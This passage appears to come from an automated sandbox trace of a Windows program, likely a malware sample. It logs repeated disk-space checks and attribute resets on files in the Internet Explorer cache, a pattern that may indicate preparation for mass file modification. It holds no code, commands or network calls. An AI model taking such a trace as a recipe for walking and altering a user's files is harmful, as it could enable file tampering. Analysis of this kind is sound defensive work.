lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.526] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBz3ebk[1].png", dwFileAttributes=0x80) returned 1 [0142.530] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.537] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\benefits-5-mobile[1].png", dwFileAttributes=0x80) returned 1 [0142.541] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.550] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\chrome-new[1].jpg", dwFileAttributes=0x80) returned 1 [0142.555] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.559] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\css[2].txt", dwFileAttributes=0x80) returned 1 [0142.563] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.571] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\fallback_728x90[1].jpg", dwFileAttributes=0x80) returned 1 [0142.578] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.583] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\ie8[1].txt", dwFileAttributes=0x80) returned 1 [0142.587] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.588] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.593] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\Passport[1].htm", dwFileAttributes=0x80) returned 1 [0142.597] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.602] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\postmessageRelay[1].htm", dwFileAttributes=0x80) returned 1 [0142.604] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.616] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\search[1].htm", dwFileAttributes=0x80) returned 1 [0142.629] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.635] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA3e1oO[1].png", dwFileAttributes=0x80) returned 1 [0142.637] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.642] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA429NP[1].png", dwFileAttributes=0x80) returned 1 [0142.644] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.652] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA42pjY[1].png", dwFileAttributes=0x80) returned 1 [0142.655] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.660] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA61AKN[2].png", dwFileAttributes=0x80) returned 1 [0142.663] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.668] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA6KizP[2].png", dwFileAttributes=0x80) returned 1 [0142.671] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.676] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA7XCQ3[1].png", dwFileAttributes=0x80) returned 1 [0142.679] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.684] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA8Tave[1].png", dwFileAttributes=0x80) returned 1 [0142.687] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.700] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAfOIDq[1].png", dwFileAttributes=0x80) returned 1 [0142.703] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.708] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAkhMz9[2].png", dwFileAttributes=0x80) returned 1 [0142.710] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.715] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAmRY2Q[1].png", dwFileAttributes=0x80) returned 1 [0142.719] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.724] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAni8qk[1].png", dwFileAttributes=0x80) returned 1 [0142.735] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.740] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\async_usersync[1].htm", dwFileAttributes=0x80) returned 1 [0142.744] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.754] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\b367c075-d98a-457d-b37d-3d9e8ab53e8b[1].jpg", dwFileAttributes=0x80) returned 1 [0142.757] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.762] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BB8jcOr[2].png", dwFileAttributes=0x80) returned 1 [0142.765] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.770] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBB8ZbM[1].jpg", dwFileAttributes=0x80) returned 1 [0142.772] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.778] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBB9wH0[1].png", dwFileAttributes=0x80) returned 1 [0142.780] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.786] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBCFjo[1].jpg", dwFileAttributes=0x80) returned 1 [0142.790] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.795] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBDtcM[1].jpg", dwFileAttributes=0x80) returned 1 [0142.798] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.803] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBIeNJ[1].jpg", dwFileAttributes=0x80) returned 1 [0142.806] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.811] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBImKX[1].jpg", dwFileAttributes=0x80) returned 1 [0142.814] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.819] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBL4R9[1].jpg", dwFileAttributes=0x80) returned 1 [0142.822] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.829] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBLhTZ[1].jpg", dwFileAttributes=0x80) returned 1 [0142.831] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.836] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBnhZY[1].jpg", dwFileAttributes=0x80) returned 1 [0142.839] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.845] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPhAr[1].jpg", dwFileAttributes=0x80) returned 1 [0142.848] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.853] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPiby[1].jpg", dwFileAttributes=0x80) returned 1 [0142.856] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.861] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPmXJ[1].jpg", dwFileAttributes=0x80) returned 1 [0142.864] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.888] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPS37[1].png", dwFileAttributes=0x80) returned 1 [0142.891] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.896] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBQiBF[1].jpg", dwFileAttributes=0x80) returned 1 [0142.899] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.904] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBty8h[1].jpg", dwFileAttributes=0x80) returned 1 [0142.907] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.912] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVACL[1].jpg", dwFileAttributes=0x80) returned 1 [0142.915] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.920] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVGyR[1].jpg", dwFileAttributes=0x80) returned 1 [0142.923] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.928] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVMtX[1].jpg", dwFileAttributes=0x80) returned 1 [0142.931] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.937] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVYsu[1].jpg", dwFileAttributes=0x80) returned 1 [0142.940] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.944] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBWLtW[1].jpg", dwFileAttributes=0x80) returned 1 [0142.948] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.953] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBX3xB[1].jpg", dwFileAttributes=0x80) returned 1 [0142.956] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.961] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBY98e[1].jpg", dwFileAttributes=0x80) returned 1 [0142.964] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.969] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBZYVP[1].jpg", dwFileAttributes=0x80) returned 1 [0142.971] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.979] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC04o2[1].jpg", dwFileAttributes=0x80) returned 1 [0142.981] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: 